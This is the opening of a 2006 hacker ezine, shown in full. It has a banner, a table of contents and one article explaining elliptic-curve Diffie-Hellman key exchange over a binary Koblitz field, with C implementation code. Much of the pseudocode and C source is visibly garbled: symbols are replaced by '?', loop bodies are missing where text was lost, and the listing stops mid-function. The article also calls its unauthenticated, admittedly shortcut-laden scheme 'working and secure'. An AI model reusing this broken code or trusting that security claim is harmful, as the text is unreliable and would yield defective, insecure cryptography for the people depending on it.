[==============================================================================] [============================= .aware eZine Alpha =============================] [==============================================================================] ___ _______ __ ___________ ___________ ____ __ __ ____ __| _/ / _ \ \/ // __ \_ __ \/ ___\_ __ \/ _ \| | \/ \ / __ | ( |_| ) /\ ___/| | \/ /_/ > | \( |_| ) | / | \/ /_/ | \____/ \_/ \___ \|__| \___ /|__| \____/|____/|___| /\____ | /| \/ /_____/ \/ \/ / | __ __ __ .__ / | | \_____ | | _| | _|__| ____ ____ / \_/ \__ \ | |/ / |/ / |/ \ / ___\ \ = // __ \| <| <| | | \/ /_/ > \__| | /(____ /__|_ \__|_ \__|___| /\___ / \/ \/ \/ \/ \//_____/ [==============================================================================] mov al,13h ; .aware cr3w sets the correct video m0de - = === == ====] int 10h ; - = = = = === === == === == = = =========== =] Too much technology, in too little time. _..gggggppppp.._ _.go101110000010111010op._ .g1101100101000011010101001001p. .g1011001101100000100001100110101100p. .o10111001100101111101010111001110101110o. .o010011100101110000101111011010000100001100o. o0001101001100001101101000101100001010011100110o o111010110010111110000000001101101111110111011101o o11010100000110001000000101111000011010110010110001o o0010110011010000000010000100010011011000001110000111o o011110101101100000110100101010001001100110101101101100o :10011111001001010001101010110100010011111100010001011000; 1000101111010111001111001110000111010100101111101101100111 :0000110100101111101001101001011110111101010111001100000101; 111011111000000101111101001111001101000110101011011001011001 :111000100111010000111100010000110111011001110101011110000100; :101111001100100011000001111110110100101101110101101010111010; 10101011000000000111000001111111011100001110100101110010000101 11001001101010100001010110111101101011011110110011111010111011 :101001010101101111000010100010011P"' "Q111100011100101011; :001001001101010111001110010010101Y Y01010011110111010; 110001111000110100100110010100110 01010100110000111 :00010110000101111010100101010011. .0011110001011001; 10111110011000011111001001110101O O1010111110001000 :11000001100011011011011100000000o,_ _,o0010011100110010; T110101001110010000110110111000001010000000100011000010P T0110011000101011101011101000000101111111111001001000P T00110111111001010010011101110110110001110001101111P T111001010010111111010101001111000011101111000101P T1110000110010100101111001111101011000000101011P `T100100101011001110111100001101011000100011P' `T11111001011011000110000011100101010111P' "^1111011011111101010101011101111000^" "^T01001111111100111100001000P^" '""^^^T0011101011T^^^""' Hello and welcome to the first .aware eZine ever to exist on planet earth. Basically, with all the h0no wannabes out there and phrack down, I thought there ought to be a little bit more actual infotainment spread into cyperspace. This way, maybe not all of us will be driven into criminal insanity by paranoid hallucinations. Enjoy the zine. PS: We're sorry for causing all that cancer. [==============================================================================] [----------------------------[ Table of Contents ]-----------------------------] [==============================================================================] 1 ECDLP Quick & Dirty rattle 2 Breaking Perl zshzn 3 Exploring RDA kharn 4 The House of Mind K-sPecial 5 Adjacent memory overflows Nomenumbra [==============================================================================] [----------------------------[ ECDLP Quick & Dirty ]---------------------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/ _`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### (C) 2006 by .aware computer security research group ################ *############* Web: http://awarenetwork.org "T######T" Author: rattle@awarenetwork.org ------------------------------------------------------[ Table of Contents ]----- i. Abstract ii. Preface iii. Mathematical Background iv. Implementation Issues - Fields v. Implementation Issues - Curves vi. Implementation vii. Conclusion viii. References -[ i ]---------------------------------------------------------[ Abstract ]----- We aim to implement a very small and versatile assymetric key exchange algorithm for x86 platforms, based on the Elliptic Curve Discrete Logarithm Problem (ECDLP). This algorithm allows 2 parties to exchange a key of sufficient length for subsequently encrypting traffic with a symmetric cipher. NOTE: This paper might offend the mathematically schooled among you because I was not exactly precise, let alone thorough. -[ ii ]---------------------------------------------------------[ Preface ]----- "I encrypt all my data with one-time pad's that consist of an electrometre measuring me urinating into the toilet. I'm secure." - sirukin It has come to my attention that modern cryptography, while being on everyone's favourite feature list, is hardly found explained in papers with the due clarity it requires. More accurately, most articles give you a rough idea of how certain cryptographic schemes work and, succeed in completely failing to give you enough insight (or tools) to implement an actually secure, working algorithm. In particular, I am referring to Elliptic Curve Cryptography (ECC), which I will be revolving around for the rest of the night. If everyone has such a compulsive thirst for knowledge - why the utter lack of enlightenment? Pretty simple. Just like the less sophisticated asymmetric schemes (like RSA), the basic idea of ECC can be wrapped up in a couple of fancy sketches and some first semester algebra. However, once you delve deeper into the topic, you will find that it is headblowingly complicated and not nearly as easy as they told you. Don't be intimidated, though. I will work around most problems of ECC with dirty tricks and hardcoded parameters. What we will get, though, is a working and secure ECDLP key exchange algorithm implemented in C for x86 machines. Mac users, rejoice. -[ iii ]----------------------------------------[ Mathematical Background ]----- "Well, just because you don't understand it, does not mean it's complicated." - My Algebra Professor (1) Fields. A field is a mathematical structure F which behaves similar to the real or the rational numbers. For in time, I recommend you think of these structures as we analyze them in a more abstract fashion. Elements of a field can be added and multiplied. Each element a has a uniquely defined additive inverse (-a) such that a+(-a)=0. Also, each element a!=0 has a multiplicative inverse (1/a) such that a * (1/a) = 1. Also, you have a*b=b*a, a*(b*c)=(a*b)*c and (a+b)*c = ac+bc. All this is obvious for real or rational numbers - but there are much more interesting structures that obey the same laws. As you might have already concluded, each field contains the Elements 0 and 1, the neutral Elements of Addition and Multiplication respectively. (Neutral because a+0=a, a*1=a.) Well, since it seems to be the smallest possible one, how about the field F2 = { 0, 1 } with Addition: Multiplication: + | 0 | 1 * | 0 | 1 ---+---+--- ---+---+--- 0 | 0 | 1 0 | 0 | 0 ---+---+--- ---+---+--- 1 | 1 | 0 1 | 0 | 1 ' ' ' ' The addition is a simple XOR operation, the multiplication works just as though 1 and 0 were integer numbers. This means, you use + and * on 0 and 1 as though they were integer numbers, but the result of your operation is the parity of the calculated number. Since there aren't that many scenarios, you can easily convince yourself that you can operate inside F2 just like you can operate on real and rational numbers. While it's an interesting and entertaining example, let's try to generalize the concept. For any prime p, let F(p) = { 0, 1, ..., p-1 } be the field where every operation is performed modulo p. This means, for any a,b in F(p), you have add(a,b) := (a + b) % p mul(a,b) := (a * b) % p It can be shown that the resulting structure is a field. Why primes? I will not go into detail here, but p being a prime is necessary for the existence of a multiplicative inverse for every a != 0. For instance, if we'd try p = 6, you had mul(2,3) = (2*3)%6 = 0, and consequentially, neither 2 or 3 would have a multiplicative inverse. However, for p=7: mul(1,1) = 1 % 7 = 1 mul(2,4) = (2 * 4) % 7 = 8 % 7 = 1 mul(3,5) = (3 * 5) % 7 = 15 % 7 = 1 mul(6,6) = (6 * 6) % 7 = 36 % 7 = 1 These fields are known as prime fields. It can be shown that every finite field (a field with finitely many elements) has p to the power of m elements, where p is a prime and m a positive integer number. We have covered the fields with p elements already, what do the others look like? Consider polynomials with coefficients in F(p). As you might know, polynomials can be added and multiplied. Most axioms of a field are already given, but we are lacking a multiplicative inverse for every polynomial of degree 1 or more. In fact, the polynomials over F(p) are, as a structure, very similar to the integer numbers - there's a polynomial division with rest, just like you have a division with rest for integers. Accordingly, you will also find prime polynomials. You will have to believe me when I tell you the following two things (or read a big book on algebra): - For any m, there exists a prime polynomial of degree m over F(p). - Performing every operation in F(p) modulo a prime polynomial of degree m yields a field structure with p to the power of m elements. We are particularly excited about polynomials over F2, because they can easily be represented as a bitstring (the coefficients of the polynomial are either 1 or 0). We will refer to this structure as F(2,m) where (m+1) is the degree of the prime polynomial we use for reduction. I cannot venture too deep into the maths here. For now, I just want you to know and trust me that F(2,m) works just like real or rational numbers - except for nasty things like a + a = (1 + 1) * a = 0 * a = 0. (2) Elliptic curves. What is an elliptic curve? An elliptic curve, for us, will be the set of all points (x,y) from any field which satisfy an equation of the form y? + xy = x? + ax? + b (*) Note that this is not the general definition of an elliptic curve. Indeed, this is a "non-supersingular" curve. However, frankly, that's all we are interested in. We will write, for given coefficients a and b: E(F) = { (x,y) : x in F, y in F, y? + xy = x? + ax? + b } + { @ } In words: E(F) is the set of all tuples (x,y) with x and y in F, such that x and y satisfy the curve equation (*). We also say that x=infinity and y=infinity satisfy the curve equation and call the point @ the "point at infinity". The sketch below shows how these kinds of curves look over the real numbers: | . | | . | . | . |. . . . .| . . .. . | . | . | ----------------------+----------------- . | . | . . .. . | . . . .| |. | . | . | . | | . There is something particularly interesting about these elliptic curves. Provided that P and Q are points on the curve, draw a line through P and Q. It will intersect the curve in a third point R'. The sum of P and Q is then defined as the negative of R', which is simply the reflection of R' about the x-axis. To add a point P to itself, you draw the tangent instead. | / | . | /. R' | / | / . | / | / . |/ / . /| . / | . / |. . . . / .| . . .. . | . / Q | . / | --------------/-------+----------------- . / | . / | . / . .. . | . . . .| / P |. / | . / | . / | . / | / | . / | / | . / | / | . / | X -R' = (P + Q) To be precise, for P = (x,y) we set -P = (x,-y). Set P + (-P) := @. As an interesting result, E(F) together with this addition law is an abelian group (that means, adding these points technically works like like adding integer numbers) with @ serving as the neutral element (the "zero"). How can we put this structure to cryptographic use? First of all, we consider elliptic curves over finite fields. Also, define a function f(n,P) = nP = P + P + ... + P <-- n times --> For very large n, this function is still easy to calculate for a given point P. However - given Q and P, it is very hard to find an integer Number n such that Q = f(n,P). This is called the Elliptic Curve Discrete Logarithm Problem. Now, due to the abelian structure, you have f(n*m,P) = f(n,f(m,P)) = f(m,f(n,P)) for any two integers n and m. Let me show you how we can exchange keys with this little trick. (1) Alice and Bob agree on a Point P in E(F). (2) Alice secretly chooses a big random number n and calculates nP. Bob also chooses big random number m and calculates mP. (3) Alice sends Bob (nP), Bob sends Alice (mP). (4) Alice calculates n(mP) = nmP =: Q. Bob also calculates m(nP) = nmP = Q. (5) Bob and Alice use Q as the key for encrypting traffic. What does Eve know? She knows P, (nP) and (mP). To get Q, she'd need the product nm. However, this would only be possible by solving the ECDLP for (nP) and (mP) (or solving a similarly hard problem). And that's that, folks. Let's get down to business! -[ iv ]----------------------------------[ Implementation Issues - Fields ]----- "If I recally correctly, the compiler does issue optimizer notes for this, it's just that they don't particularly stand out from the other notes so you might not realize that these particular optimization notes are OPTIMIZATION PROBLEMS WHICH WILL BURN ALL YOUR CPU CYCLES IN THE DEEPEST PITS OF COMPUTATIONAL HELL." - William Newman on run-time casting with SBCL (#lisp 2003/03/29) First of all, the ECDLP is hard only if the two following rather strong conditions are met: - The number of elements in your finite Field is larger than at least 2 to the power of 128. 256 bits is better, 512 scares the NSA. - The number of points on your elliptic curve is almost prime, which means that it is of the form |E(F)| = h * p, where p is prime and h very small. This leads to the following problems: (A) Implement sufficiently fast finite field arithmetics for fields with approximately 1.34e+154 elements (that's around 512 bits). (B) Find a curve which has appropriate order. Problem (A) is our biggest problem, as (B) has been solved by government agencies and smart mathematicians around the world. So we're left with the task of implementing F(2,m) for m ~= 512. Polynomials will be implemented as bitstrings of length m, stored in a little endian array of T = (m/32) machine words (32 bits). (1) Shifting / Multiplication with x. Because we store polynomials as bitstrings, shifting is a cheap linear operation. Only consider shifts of l<32 (for shifts larger than our wordsize of 32, we can shift word-wise first in linear time). We now have to shift and rotate through the carry bit at most 31*(m/32) ~ m times. (2) Addition. Adding two polynomials in F(2,m) is trivially linear. It is implemented as T XOR operations. (3) Multiplication. Multiplication might seem more complicated, but is easily implemented in O(m?). It works like this: -------------------------------------------------------------- Bitwise Comb Polynomial Multiplication Algorithm -------------------------------------------------------------- Input: Polynomials p(x), q(x) as bitstrings Output: c(x) = p(x) * q(x) SET c(x) = 0 FOR i=0 TO m DO: IF bit i of p(x) is set: c(x) := c(x) + (q(x) << i) RETURN c(x) -------------------------------------------------------------- You can achieve better complexity with a divide-and-conquer approach as explained in [K1]. However - for m as small as approximately 512 bit, benchmarks for bitwise comb turn out to be faster than benchmarks for divide&conquer, on several systems. Thus, for our purposes, the algorithm is completely sufficient, if not optimal. (4) Squaring. Calculating p(x)? can be implemented as a very fast linear operation due to the following observation which only applies to fields where 1+1=0: (a + b + c)? = (a + b + c) (a + b + c) = a? + ab + ac + ba + b? + bc + ca + cb + c? = a? + b? + c? + (1+1)ab + (1+1)ac + (1+1)bc = a? + b? + c? Thus, given a polynomial p(x) as bitstring, we can calculate p(x)? by simply inserting zeros between all bits. For instance, (1100111)? = (1010000010101) With a wee bit of precomputation, this is easily done in 4T = m/8 steps. (5) Reduction. The algorithms for squaring and multiplication yield polynomials of degree > m. These polynomials need to be reduced modulo a prime polynomial f(x) of degree m+1. For now, assume we have such an algorithm. (6) Inversion. Last, but definitely not least, we need a "division" algorithm. This means, for a given polynomial p(x), find the (uniquely defined) multiplicative inverse polynomial q(x), such that: p(x) * q(x) = 1 mod f(x) where f(x) is our reduction polynomial. To find the Inverse, we use the polynomial version of euclid's extended algorithm: -------------------------------------------------------------- Euclid's Extended Algorithm (Polynomial) -------------------------------------------------------------- Input: Polynomials p(x) and f(x) Output: Polynomials a(x),b(x) and d(x) such that a(x) * p(x) + b(x) * f(x) = d(x) SET a(x) = 1, a?(x) = 0, b(x) = 0, b?(x) = 1 SET u(x) = p(x), d(x) = f(x) WHILE u(x) != 0 DO: SET j := deg(u(x)) - deg(v(x)) IF j < 0: u <-> d a <-> a? b <-> b? j := -j u(x) := u(x) + ( d(x)< b" means "exchange a and b". In this particular case, we always have d(x) = 1 because f(x) is prime, and we don't care about b(x). The only thing that is left to be done is reduction. This is the only algorithm that depends on the form of the reduction polynomial f(x). This is also the only algorithm that requires a lot of work and hand-tuned optimization. You can skip the rest of this chapter if you are not interested in this kind of stuff. We will now try to find a reduction polynomial of degree > 512 which is particularly suited for reduction. On the other hand, why try to find one if one has already been found? The [F1] standard suggests reduction modulo the pentanomial -------------------------------------------------------------- Pentanomial f571(x) -------------------------------------------------------------- f(x) = x**571 + x**10 + x**5 + x**2 + 1 ~ (1<<571) + (1<<10) + (1<<5) + (1<<2) + 1 = 0x 08000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000425 -------------------------------------------------------------- Write f(x) = h(x) + r(x). where h(x)= (1<<571). Also assume we have a polynomial p(x) of degree at most 2m = 1140. Write p(x) = b(x)*h(x) + a(x). with polynomials b(x),a(x) of degree m. Because b(x)h(x) = b(x)f(x) + b(x)r(x) We get that b(x)h(x) = b(x)r(x) mod f(x), thus we have p(x) = b(x)r(x) + a(x) mod f(x). Now we're getting down to the hard part. We need to devise a fast reduction algorithm. Assume that the bitstring of P is stored as an array of unsigned little endian machine words p(x) = P[2T], P[2T-1], ..., P[T], P[T-1], ..., P[0] In this case, our polynomial b(x) starts at bitoffset 26 of P[T-1], because we assume a(x) to be a 570 bit polynomial which does not need to be reduced. Consider: <---- P[2T] ---> <--- P[T] ---> <------------ P[T-1] ---------------> {1151} .. {1120} ... {608} .. {576} {575}{574}{573}{572}{571} {570} ..... <---------------------------- B ----------------------------> <--- A ---> This means we have to understand B[i] == (P[i+T]<<5) ^ (P[i+T-1]>>27). Also, obviously A[i] == P[i]. Now, let's forget this for a while and think about how b(x)r(x) is calculated. We have r(x) = (1<<10)+(1<<5)+(1<<2)+1 = 0x425. We get B[i]*R = B[i] ^ (B[i] << 10) ^ (B[i] << 5) ^ (B[i] << 2) and a (maximum 10-bit) carry: C(B,i) := (B[i] >> 22) ^ (B[i] >> 27) ^ (B[i] >> 30) Thus, in one step of our algorithm, we will have to do ------------------------------------------------------------------------- FOR i = 1, ..., T-1 DO P[i] := A[i] ^ B[i] ^ (B[i] << 10) ^ (B[i] << 5) ^ (B[i] << 2) P[i+1] := A[i+1] ^ C(B,i) ------------------------------------------------------------------------- Consider what we had before and we get P[i] = ((P[i+T]<<5) ^ (P[i+T-1]>>27)) ^ ( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) << 5 ) ^ ( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) << 2 ) ^ ( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) << 10 ) ^ P[i] = P[i] ^ (P[i+T]<<5) ^ (P[i+T]<<7) ^ (P[i+T]<<10) ^ (P[i+T]<<15) ^ (P[i+T-1]>>27) ^ (P[i+T-1]>>27)<<2 ^ (P[i+T-1]>>27)<<5 ^ (P[i+T-1]>>27)<<10 (*) P[i+1] = ( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) >> 22) ^ ( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) >> 27) ^ ( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) >> 30) ^ P[i+1] = P[i+1] ^ (P[i+T]<<5)>>22 ^ (P[i+T]<<5)>>27 ^ (P[i+T]<<5)>>30 however, one step later, P[i+1] will be XOR'd with (*). We have, if we look at a bitwise representation of X: Bits, numbered from A to 6: Variable: Label: ABCDEFGHIJKLMNOPQRSTUVWXYZ123456 (X) ^ 0000000000000000000000ABCDE00000 (X>>27)<<5 (A1) ^ 000000000000000000000000000FGHIJ (X<<5)>>27 (A2) ^ 0000000000000000000000FGHIJKLMNO (X<<5)>>22 (B1) ^ 000000000000000000000000000000FG (X<<5)>>30 (C1) ^ 000000000000000000000000000ABCDE (X>>27) (D) ^ 0000000000000000000000000ABCDE00 (X>>27)<<2 (C2) ^ 00000000000000000ABCDE0000000000 (X>>27)<<10 (B2) /\ /\ /\ || || || \/ \/ \/ ABCDEFGHIJKLMNOPQRSTUVWXYZ123456 (X) ^ 0000000000000000000000ABCDEFGHIJ (X>>22) (A) = (A1)^(A2) ^ 000000000000000000000000000ABCDE (X>>27) (D) ^ 0000000000000000000000000ABCDEFG (X>>25) (C) = (C1)^(C2) ^ 00000000000000000ABCDEFGHIJKLMNO (X>>17) (B) = (B1)^(B2) Hence, we can rewrite our Algorithm to: ------------------------------------------------------------------------- FOR i = T-1, ..., 0 DO SET X := P[i+T] P[i] := P[i] ^ (X<<5) ^ (X<<7) ^ (X<<10) ^ (X<<15) P[i+1] := P[i+1] ^ (X>>17) ^ (X>>22) ^ (X>>25) ^ (X>>27) ------------------------------------------------------------------------- The Polynomial we get after reduction will, of course, still have degree > 570. However, since deg(C(B,T)) <= 10 and deg(r(x)) <= 10, we have deg(C(B,T)r(x)) <= 20, which fits into one single machine word. Hence, we should be able to complete the reduction with one more operation (and a few shifts). Without proof I will tell you that we can complete the reduction algorithm to: ------------------------------------------------------------------------- Polynomial Reduction Algorithm Modulo f571 ------------------------------------------------------------------------- Input: Polynomial p(x) of degree 1140 or less, stored as an array of 2T machinewords. Output: p(x) mod f571(x) FOR i = T-1, ..., 0 DO SET X := P[i+T] P[i] := P[i] ^ (X<<5) ^ (X<<7) ^ (X<<10) ^ (X<<15) P[i+1] := P[i+1] ^ (X>>17) ^ (X>>22) ^ (X>>25) ^ (X>>27) SET X := P[T-1] >> 27 P[0] := P[0] ^ X ^ (X<<2) ^ (X<<5) ^ (X<<10) P[T-1] := P[T-1] & 0x07ffffff RETURN P[T-1],...,P[0] ------------------------------------------------------------------------- We're done! We have each and every function to implement a fast 570 bit binary field. -[ iv ]----------------------------------[ Implementation Issues - Curves ]----- "Premature Optimization is the root of all evil." - Tony Hoare Now that we have a field to work with, we need to sort out some final issues with the curve implementation. As I told you before, the ECDLP is hard only if the curve does not have a smooth order. At this point we shortcut a huge problem of elliptic curve cryptography by choosing a hardcoded (Koblitz) curve over F(2,570) which has almost prime order. That curve is E0: y? + xy = x? + 1 This is a non-supersingular Koblitz curve over F2. Fancy words, huh? The laws for point addition work as follows: 1. P + @ = @ + P = P for all P in E(F(2,m)) 2. The negative of P = (x,y) is -P = (x, x + y). Also, -@ = @ and of course, P + (-P) = @. 3. Point addition: Let P=(x1,y1) and Q=(x2,y2), where P is neither Q nor -Q. Then we have P + Q = (x3,y3), where x3 = l? + l + x1 + x2 (y1 + y2) with l := --------- y3 = l(x1+x3) + x3 + y1 (x1 + x2) 4. Point doubling. Let P = (x, y) and P is not -P. Then we will write P+P = 2P = (a, b), where a = l? + l = x? + (1/x?) (x + y) with l := ------- b = l(x+a) + a + y x But wait! You said in (iii.) that -(x,y) = (x,-y)! Yea. I lied. That law in (iii) is not the law for non-supersingular curves over F2, but for curves over the real numbers. You see, in F(2,570), many things are very different from other fields because we have 1+1=0. Simple things like dividing by 2 turn out to be real explosive. Hence, most algorithms and laws have to be tweaked a bit. Know that Koblitz curves have special traits which gave birth to a lot of literally insane optimization algorithms. Also know that I did not implement any of these. It might be a topic for later papers. Instead, the above laws have been implemented naively. What requires a wee bit of attention is the point multiplication algorithm. First of all, point multiplication is defined as the n-fold addition of a point P. Here, n is any integer number. We will use a standard square & multiply (double & add) algorithm to implement the point multiplication using point addition. Hence, we will view the integer number as a bitstring and consequentially, we can use the same data type for 576-bit polynomials and 576-bit integer numbers. --------------------------------------------------------- Double & Add Point Multiplication Algorithm --------------------------------------------------------- Input: Point P, Polynomial k(x) over Z Output: k(2)*P SET Q := P FOR i = deg(k), ..., 0 DO: Q := Q+Q IF bit i of k(x) is set THEN: Q := Q+P RETURN Q --------------------------------------------------------- Our work here is almost done. The only remaining problem is - how do we find a point on the curve? (1,1) and (1,0) are trivial solutions, but they are of such small order that they are not really suitable for key exchange via ECDLP. On the other hand, |E(F)| ~= q, where q = |F| (there are approximately as many points on the curve as there are elements in the underlying field). Since we have q? possible point combinations, we have a probability of 1/q ~= 2.59e-172 that a random point actually satisfies the curve equation. We will work around this problem the same way we worked around most problems so far - we won't solve it. The following point is, according to [F1], a generator point of the koblitz curve we chose in little Endian notation: PGEN = { 0xA01C8972,0xE2945283,0x4DCA88C7,0x988B4717,0x494776FB,0xBBD1BA39, 0xB4CEB08C,0x47DA304D,0x93B205E6,0x43709584,0x01841CA4,0x60248048, 0x0012D5D4,0xAC9CA297,0xF8103FE4,0x82189631,0x59923FBC,0x026EB7A8, 0x3EF1C7A3,0x01CD4C14,0x591984F6,0x320430C8,0x7BA7AF1B,0xB620B01A, 0xF772AEDC,0x4FBEBBB9,0xAC44AEA7,0x9D4979C0,0x006D8A2C,0xFFC61EFC, 0x9F307A54,0x4DD58CEC,0x3BCA9531,0x4F4AEADE,0x7F4FBF37,0x0349DC80 } What is a generator point? A point P of E(F) is called a generator point if and only if for every Q in E(F), there is an integer number n such that nP = Q. In plain English, this point generates the entire curve. In step (1) of the key exchange, explained in the last paragraph of chapter (iii), we will always choose the point PGEN. Now, having cheated our way around the more cumbersome problems of ECC, we shall have some fun. -[ vi ]--------------------------------------------------[ Implementation ]----- "I considered life, I implemented life, now, life is boring." - thE AWKz In the Appendix, you will find the following files: binfields.h curve.h binfields.c curve.c The binfields module implements polynomial extension fields modulo the prime polynomial presented in (iv). All operations are implemented as described in (iv) and provide sufficiently fast arithmetics. The curve module implements the koblitz curve E0 as described in (iv). Note that the curve module has not been optimized for speed. I have tested the Module, and for a full-blown key exchange, the algorithm takes around 3-4 seconds, which means an effort of max. 2 seconds for each party. This is reasonably fast and definitely fast enough for any real life application. On a slow box, this might grow to time spans of 10 seconds, but I still think it is within acceptable range. Now, how does the Module work? Basically, include curve.h and then, all you need are the following functions: word* pointMul(word* R, word* k, word* P); word* pointGen(); word* polyRand(); polyRand() generates a random polynomial in F(2,570). For the sake of point Multiplication, it can also be interpreted as a 570-bit integer number. pointGen() gives you a hardcoded generator point of E0. For key exchange, each side performs the following operation (after initializing the random number generator): -------------------------------------------------------------- word* n = polyRand(); word* P = pointGen(); pointMul(P,n,P); // P := nP sendToBob(P); // send (nP) to bob recvFromBob(P); // get (mP) from bob pointMul(P,n,P); // calculate Q = nmP = n(mP) free(n); /* use the 36-word array P or any substring of it for symmetric encryption. */ -------------------------------------------------------------- And voila, you're good to go. -[ vii ]-----------------------------------------------------[ Conclusion ]----- "I know that you believe you understand what you think I said, but I'm not sure you realize that what you heard is not what I meant." - Robert McCloskey We have implemented exactly what we wanted - a quick and dirty ECDLP key exchange algorithm. It is far from being a comprehensive and complete ECC library - it is limited. On the other hand, it is small and easily incorporated with applications you might already have. Any kind of remote networking software can now be equipped with full-blown assymetric encryption. I can imagine a whole lot of ways to put this option to good use. And now, enjoy the code. -[ viii ]----------------------------------------------------[ References ]----- [K1] Karatsuba - Ofman Multiplication using Divide & Conquer http://mathworld.wolfram.com/KaratsubaMultiplication.html [F1] Federal Information Processing Standards Publication FIPS-186-2 - Digital Signature Standard http://csrc.nist.gov/publications/fips/fips186-2/fips186-2-change1.pdf [==============================================================================] [--------------------------------[ APPENDIX ]----------------------------------] [==============================================================================] All files have been compiled using Microsoft Visual Studio 6 on Windows. Since there is a lot of inline Assembler, you might have to hand-tweak this code for other platforms. ------------------------------------------------------------------- #ifndef _BINFIELDS__H #define _BINFIELDS__H typedef unsigned char byte; typedef unsigned long word; #define SIZE_BITS 0x0000023a #define SIZE_WORDS 0x00000012 #define SIZE_BYTES 0x00000048 #define EMPTY_MASK 0x07ffffff #define SIZE_BITS2 0x00000474 #define SIZE_WORDS2 0x00000024 #define SIZE_BYTES2 0x00000090 void __fastcall lshift(word* a, word n); void __fastcall rshift(word* a, word n); int deg(word *a); int __fastcall polyCmp(word *a, word *b); int __fastcall polyIsZero(word *a); word* __fastcall polyAdd(word* c, word* a, word* b); word* __fastcall polyAddTo(word* a, word* b); word* polySqr(word* c, word* a); word* polyMul(word* c, word *a, word *b); word* polyDiv(word* c, word *a, word *b); word* polyInv(word *c, word *a); word* polyGen(); word* polyRand(); word* polyDup(word* a); #endif ------------------------------------------------------------------- #include #include #include #include #include "binfields.h" // Precomputed Array. For each byte a1,a2,...,a8, this // array contains the halfword a1,0,a2,0,a3,0,...,0,a8. // This is used for fast squaring. const static unsigned short POW[0x100] = { 0x0000,0x0001,0x0004,0x0005,0x0010,0x0011,0x0014,0x0015, 0x0040,0x0041,0x0044,0x0045,0x0050,0x0051,0x0054,0x0055, 0x0100,0x0101,0x0104,0x0105,0x0110,0x0111,0x0114,0x0115, 0x0140,0x0141,0x0144,0x0145,0x0150,0x0151,0x0154,0x0155, 0x0400,0x0401,0x0404,0x0405,0x0410,0x0411,0x0414,0x0415, 0x0440,0x0441,0x0444,0x0445,0x0450,0x0451,0x0454,0x0455, 0x0500,0x0501,0x0504,0x0505,0x0510,0x0511,0x0514,0x0515, 0x0540,0x0541,0x0544,0x0545,0x0550,0x0551,0x0554,0x0555, 0x1000,0x1001,0x1004,0x1005,0x1010,0x1011,0x1014,0x1015, 0x1040,0x1041,0x1044,0x1045,0x1050,0x1051,0x1054,0x1055, 0x1100,0x1101,0x1104,0x1105,0x1110,0x1111,0x1114,0x1115, 0x1140,0x1141,0x1144,0x1145,0x1150,0x1151,0x1154,0x1155, 0x1400,0x1401,0x1404,0x1405,0x1410,0x1411,0x1414,0x1415, 0x1440,0x1441,0x1444,0x1445,0x1450,0x1451,0x1454,0x1455, 0x1500,0x1501,0x1504,0x1505,0x1510,0x1511,0x1514,0x1515, 0x1540,0x1541,0x1544,0x1545,0x1550,0x1551,0x1554,0x1555, 0x4000,0x4001,0x4004,0x4005,0x4010,0x4011,0x4014,0x4015, 0x4040,0x4041,0x4044,0x4045,0x4050,0x4051,0x4054,0x4055, 0x4100,0x4101,0x4104,0x4105,0x4110,0x4111,0x4114,0x4115, 0x4140,0x4141,0x4144,0x4145,0x4150,0x4151,0x4154,0x4155, 0x4400,0x4401,0x4404,0x4405,0x4410,0x4411,0x4414,0x4415, 0x4440,0x4441,0x4444,0x4445,0x4450,0x4451,0x4454,0x4455, 0x4500,0x4501,0x4504,0x4505,0x4510,0x4511,0x4514,0x4515, 0x4540,0x4541,0x4544,0x4545,0x4550,0x4551,0x4554,0x4555, 0x5000,0x5001,0x5004,0x5005,0x5010,0x5011,0x5014,0x5015, 0x5040,0x5041,0x5044,0x5045,0x5050,0x5051,0x5054,0x5055, 0x5100,0x5101,0x5104,0x5105,0x5110,0x5111,0x5114,0x5115, 0x5140,0x5141,0x5144,0x5145,0x5150,0x5151,0x5154,0x5155, 0x5400,0x5401,0x5404,0x5405,0x5410,0x5411,0x5414,0x5415, 0x5440,0x5441,0x5444,0x5445,0x5450,0x5451,0x5454,0x5455, 0x5500,0x5501,0x5504,0x5505,0x5510,0x5511,0x5514,0x5515, 0x5540,0x5541,0x5544,0x5545,0x5550,0x5551,0x5554,0x5555 }; void __fastcall lshift2(word* a, word n); word* __fastcall __reduce(word* c, word* temp) { register int i; register word T; if (!deg(&c[SIZE_WORDS]) && deg(c)<=SIZE_BITS) goto __reduce_done; for (i=SIZE_WORDS2-1;i>=SIZE_WORDS;i--) { T = c[i]; c[i-SIZE_WORDS] ^= (T<<5) ^ (T<<7) ^ (T<<10) ^ (T<<15); c[i-SIZE_WORDS+1] ^= (T>>27) ^ (T>>25) ^ (T>>22) ^ (T>>17); } T = c[SIZE_WORDS-1] >> 27; c[0] = c[0] ^ T ^ (T<<2) ^ (T<<5) ^ (T<<10); c[SIZE_WORDS-1] = c[SIZE_WORDS-1] & EMPTY_MASK; __reduce_done: return memcpy(temp, c, SIZE_BYTES); } word* polyMul(word* r, word* a, word* b) { register int k,j; word c[SIZE_WORDS2] = {0}; for (k=31;k>=0;k--) { for (j=0;j>k)&1) polyAddTo(&c[j],b); if (k) lshift2(c,1); } return __reduce(c,r); } word* polySqr(word* r, word *a) { register word i; word c[SIZE_WORDS2] = {0}; for (i=0;i>0x00) & 0xFF]; c[2*i] += POW[(a[i]>>0x08) & 0xFF] << 0x10; c[2*i+1] = POW[(a[i]>>0x10) & 0xFF]; c[2*i+1] += POW[(a[i]>>0x18) & 0xFF] << 0x10; } return __reduce(c,r); } word* polyDiv(word *c, word *a, word *b) { word t[SIZE_WORDS]; return polyMul(c,a,polyInv(t,b)); } word* polyInv(word *r, word* a) { register word t; register int j; word x[5*SIZE_WORDS] = {0}, *v = &x[1*SIZE_WORDS], *u = &x[2*SIZE_WORDS], *g = &x[3*SIZE_WORDS], *f = &x[4*SIZE_WORDS]; memcpy(u,a,SIZE_BYTES); v[0] = 0x425; v[SIZE_WORDS-1] = 0x08000000; g[0] = 1; inv_loop: if (u[0]==1 || u[0]==0) { for (j=1;j u t = (word) g; g = f; f = (word*) t; // g <-> f j 